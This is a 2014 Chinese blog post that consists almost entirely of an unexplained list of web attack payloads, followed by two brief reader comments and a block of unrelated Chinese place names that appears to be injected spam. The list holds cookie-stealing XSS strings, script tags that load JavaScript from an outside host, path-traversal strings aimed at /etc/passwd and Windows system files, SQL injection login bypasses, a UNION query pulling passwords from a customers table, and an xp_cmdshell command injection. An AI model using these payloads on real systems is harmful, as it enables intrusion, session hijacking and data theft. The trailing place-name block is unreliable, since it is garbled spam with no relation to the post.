qileilove

          blog已經(jīng)轉(zhuǎn)移至github,大家請(qǐng)?jiān)L問(wèn) http://qaseven.github.io/

          XSS跨站測(cè)試代碼大全

          ‘><script>alert(document.cookie)</script>
          =’><script>alert(document.cookie)</script>
          <script>alert(document.cookie)</script>
          <script>alert(vulnerable)</script>
          %3Cscript%3Ealert(‘XSS’)%3C/script%3E
          <script>alert(‘XSS’)</script>
          <img src=”javascript:alert(‘XSS’)”>
          %0a%0a<script>alert(\”Vulnerable\”)</script>.jsp
          %22%3cscript%3ealert(%22xss%22)%3c/script%3e
          %2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
          %2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
          %3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
          %3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
          %3cscript%3ealert(%22xss%22)%3c/script%3e/index.html
          %3f.jsp
          %3f.jsp
          <script>alert(‘Vulnerable’);</script>
          <script>alert(‘Vulnerable’)</script>
          ?sql_debug=1
          a%5c.aspx
          a.jsp/<script>alert(‘Vulnerable’)</script>
          a/
          a?<script>alert(‘Vulnerable’)</script>
          “><script>alert(‘Vulnerable’)</script>
          ‘;exec%20master..xp_cmdshell%20′dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt’–&&
          %22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
          %3Cscript%3Ealert(document. domain);%3C/script%3E&
          %3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=
          1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=
          http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/etc/passwd
          ..\..\..\..\..\..\..\..\windows\system.ini
          \..\..\..\..\..\..\..\..\windows\system.ini
          ”;!–”<XSS>=&{()}
          <IMG src=”javascript:alert(‘XSS’);”>
          <IMG src=javascript:alert(‘XSS’)>
          <IMG src=JaVaScRiPt:alert(‘XSS’)>
          <IMG src=JaVaScRiPt:alert(“XSS”)>
          <IMG src=javascript:alert(‘XSS’)>
          <IMG src=javascript:alert(‘XSS’)>
          <IMG src=javascript:alert('XSS')>
          <IMG src=”jav ascript:alert(‘XSS’);”>
          <IMG src=”jav ascript:alert(‘XSS’);”>
          <IMG src=”jav ascript:alert(‘XSS’);”>
          “<IMG src=java\0script:alert(\”XSS\”)>”;’ > out
          <IMG src=” javascript:alert(‘XSS’);”>

          <SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
          <BODY BACKGROUND=”javascript:alert(‘XSS’)”>
          <BODY ONLOAD=alert(‘XSS’)>
          <IMG DYNSRC=”javascript:alert(‘XSS’)”>
          <IMG LOWSRC=”javascript:alert(‘XSS’)”>
          <BGSOUND src=”javascript:alert(‘XSS’);”>
          <br size=”&{alert(‘XSS’)}”>
          <LAYER src=”http://xss.ha.ckers.org/a.js”></layer>
          <LINK REL=”stylesheet” href=”javascript:alert(‘XSS’);”>
          <IMG src=’vbscript:msgbox(“XSS”)’>
          <IMG src=”mocha:[code]">
          <IMG src="livescript:[code]">
          <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
          <IFRAME src=javascript:alert('XSS')></IFRAME>
          <FRAMESET><FRAME src=javascript:alert('XSS')></FRAME></FRAMESET>
          <TABLE BACKGROUND="javascript:alert('XSS')">
          <DIV STYLE="background-image: url(javascript:alert('XSS'))">
          <DIV STYLE="behaviour: url('http://www.how-to-hack.org/exploit.html');">
          <DIV STYLE="width: expression(alert('XSS'));">
          <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
          <IMG STYLE='xss:expre\ssion(alert("XSS"))'>
          <STYLE TYPE="text/javascript">alert('XSS');</STYLE>
          <STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A></A>
          <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
          <BASE href="javascript:alert('XSS');//">
          getURL("javascript:alert('XSS')")
          a="get";b="URL";c="javascript:";d="alert('XSS');";eval(a+b+c+d);
          <XML src="javascript:alert('XSS');">
          "> <BODY ONLOAD="a();"><SCRIPT>function a(){alert('XSS');}</SCRIPT><"
          <SCRIPT src="http://xss.ha.ckers.org/xss.jpg"></SCRIPT>
          <IMG src="javascript:alert('XSS')"
          <!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://xss.ha.ckers.org/a.js></SCRIPT>'"-->
          <IMG src="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
          <SCRIPT a=">" src="http://xss.ha.ckers.org/a.js"></SCRIPT>
          <SCRIPT =">" src="http://xss.ha.ckers.org/a.js"></SCRIPT>
          <SCRIPT a=">" '' src="http://xss.ha.ckers.org/a.js"></SCRIPT>
          <SCRIPT "a='>'" src="http://xss.ha.ckers.org/a.js"></SCRIPT>
          <SCRIPT>document.write("<SCRI");</SCRIPT>PT src="http://xss.ha.ckers.org/a.js"></SCRIPT>
          <A href=http://www.gohttp://www.google.com/ogle.com/>link</A>
          admin'--
          ' or 0=0 --
          " or 0=0 --
          or 0=0 --
          ' or 0=0 #
          " or 0=0 #
          or 0=0 #
          ' or 'x'='x
          " or "x"="x
          ') or ('x'='x
          ' or 1=1--
          " or 1=1--
          or 1=1--
          ' or a=a--
          " or "a"="a
          ') or ('a'='a
          ") or ("a"="a
          hi" or "a"="a
          hi" or 1=1 --
          hi' or 1=1 --
          hi' or 'a'='a
          hi') or ('a'='a
          hi") or ("a"="a[/code]

          posted on 2014-02-14 11:32 順其自然EVO 閱讀(3323) 評(píng)論(2)  編輯  收藏

          評(píng)論

          # re: XSS跨站測(cè)試代碼大全[未登錄](méi) 2014-11-24 19:04 123

          <script>alert(‘Vulnerable’);</script>  回復(fù)  更多評(píng)論   

          # re: XSS跨站測(cè)試代碼大全 2014-12-29 10:07 people

          for god's sake  回復(fù)  更多評(píng)論   


          只有注冊(cè)用戶(hù)登錄后才能發(fā)表評(píng)論。


          網(wǎng)站導(dǎo)航:
           
          <2014年12月>
          30123456
          78910111213
          14151617181920
          21222324252627
          28293031123
          45678910

          導(dǎo)航

          統(tǒng)計(jì)

          常用鏈接

          留言簿(55)

          隨筆分類(lèi)

          隨筆檔案

          文章分類(lèi)

          文章檔案

          搜索

          最新評(píng)論

          閱讀排行榜

          評(píng)論排行榜

          主站蜘蛛池模板: 洛浦县| 通道| 化德县| 清流县| 吐鲁番市| 宜良县| 新绛县| 包头市| 浑源县| 新竹县| 利津县| 新邵县| 遂宁市| 广南县| 且末县| 新竹县| 开平市| 久治县| 富平县| 海晏县| 绿春县| 巧家县| 新宁县| 万载县| 龙南县| 手游| 桐乡市| 大化| 双鸭山市| 伊通| 巨野县| 叶城县| 涟水县| 宾阳县| 卓资县| 敖汉旗| 宁国市| 从化市| 门头沟区| 凤台县| 衡山县|